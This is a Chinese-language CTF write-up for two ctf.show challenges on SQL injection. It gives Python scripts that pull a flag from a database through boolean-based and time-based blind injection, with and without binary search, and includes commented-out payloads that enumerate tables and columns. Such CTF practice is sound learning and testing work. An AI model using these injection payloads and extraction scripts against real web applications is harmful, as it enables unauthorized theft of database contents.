因为觉得脚本写的太烂了，二分法也迷迷糊糊的

主要是python怎么学的那么烂！！

再研究一下

174 布尔盲注

这是不使用二分法的

import requests

url = 'http://e9a1012f-6cb2-451d-9084-0d011dfcff89.challenge.ctf.show/api/v4.php'
flag = ''

for i in range(60):
    for j in range(32, 128):
        payload = f"?id=1' union select 'a',if(ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag'),{i},1))={j},'True','False') --+"
        r = requests.get(url=url+payload).text

        if 'True' in r:
            flag += chr(j)
            print(flag)
            break

二分法其实也不难

意思就是在32，128之间先取一个中间值80

然后先在80，128之间遍历，看看有没有出现admin，

如果出现了，那么接下来就在81，128之间遍历，取low为81，再重新取中间值

如果没有出现，那么就在32，80之间遍历，取high为80,再取中间值

import requests

url = "http://e9a1012f-6cb2-451d-9084-0d011dfcff89.challenge.ctf.show/api/v4.php"
payload="?id=1' and (ascii(substr((select group_concat(password)from ctfshow_user4 where username='flag'),{0},1))>{1})-- +"
flag=''

for i in range(1,60):
    high=128
    low=32
    mid=(high+low)//2
    while (high > low):
        payload1=payload.format(i,mid)

        r=requests.get(url=url+payload1).text

        if "admin" in r:
            low=mid+1
        else:
            high=mid
        mid=(high+low)//2

    flag+=chr(mid)
    print(flag)

175 时间盲注

这是不使用二分法的

import requests

import time

url = 'http://7d8bc038-f515-4177-88d7-4bbcb2db6a54.challenge.ctf.show/api/v5.php'
flag = ''

for i in range(1, 60):
    for j in range(32, 128):
        payload = f"?id=1' and if(ascii(substr((select group_concat(password) from ctfshow_user5 where username='flag'),{i},1))>{j},sleep(0.5),0)--+"
        start_time = time.time()
        r = requests.get(url=url + payload).text
        end_time = time.time()

        if end_time - start_time <= 0.48:
            flag += chr(j)
            print(flag)
            break

这里的时间主要是用bp抓包，来看响应的时间

我们这里设置她睡的时间是0.5秒

因为知道flag第一位是c，ascii为99，我们可以看到当满足条件的时候，睡眠时间大约为0.5秒

 但是不满足条件的时候，响应时间大约为0.05秒

下面使用二分法

判断对错的条件在时间上

import requests
import time

url = "http://7d8bc038-f515-4177-88d7-4bbcb2db6a54.challenge.ctf.show/api/v5.php?id="
# payload = "1' and if(ascii(substr((select database()),{0},1))>{1},sleep(2),1)-- +"
# payload = "1' and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{0},1))>{1},sleep(2),1)-- +"
# payload = "1' and if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_user5'),{0},1))>{1},sleep(2),1)-- +"
payload = "1' and if(ascii(substr((select group_concat(password)from ctfshow_user5 where username='flag'),{0},1))>{1},sleep(2),1)-- +"
flag = ''

for i in range(1, 50):
    high = 128
    low = 32
    mid = (high + low) // 2
    while (high > mid):
        payload1 = payload.format(i, mid)

        start_time = time.time()
        r = requests.get(url=url + payload1)
        stop_time = time.time()
        sub = stop_time - start_time
        if sub > 1.8:
            low = mid + 1
        else:
            high = mid
        mid = (high + low) // 2

    flag += chr(mid)
    print(flag)

当满足条件的时候，睡眠时间大约>1.8

那么这个时候说明ascii在mid和high之间，需要调整low的值

 如果不满足条件，则说明在low和mid之间，需要调整high的值